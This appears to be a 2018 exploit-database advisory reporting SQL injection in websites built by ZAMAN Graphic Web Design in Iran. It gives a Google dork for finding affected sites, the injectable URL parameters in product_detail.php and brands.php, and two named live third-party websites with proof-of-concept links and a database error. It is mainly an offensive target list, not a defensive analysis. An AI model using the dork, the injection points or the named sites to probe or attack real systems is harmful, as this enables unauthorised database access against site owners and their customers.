#################################################################################################
# Exploit Title : ZAMAN Graphic Web Design Iran SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 28/09/2018
# Vendor Homepage : zamangraphic.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork :
intext:''Designed and Powered by ZAMAN''
# Exploit :
/fa/product_detail.php?pid=[ID-NUMBER]&p=[SQL Injection]
/en/brands.php?brandid=[SQL Injection]
#################################################################################################
# Example Vulnerable Sites =>
avehplast.ir/fa/product_detail.php?pid=20&p=7' => [ Proof of Concept ] => archive.is/00ifz
celtisco.com/en/brands.php?brandid=13%27 => [ Proof of Concept ] => archive.is/tJQdU
# SQL Database Error =>
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' at line 1
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################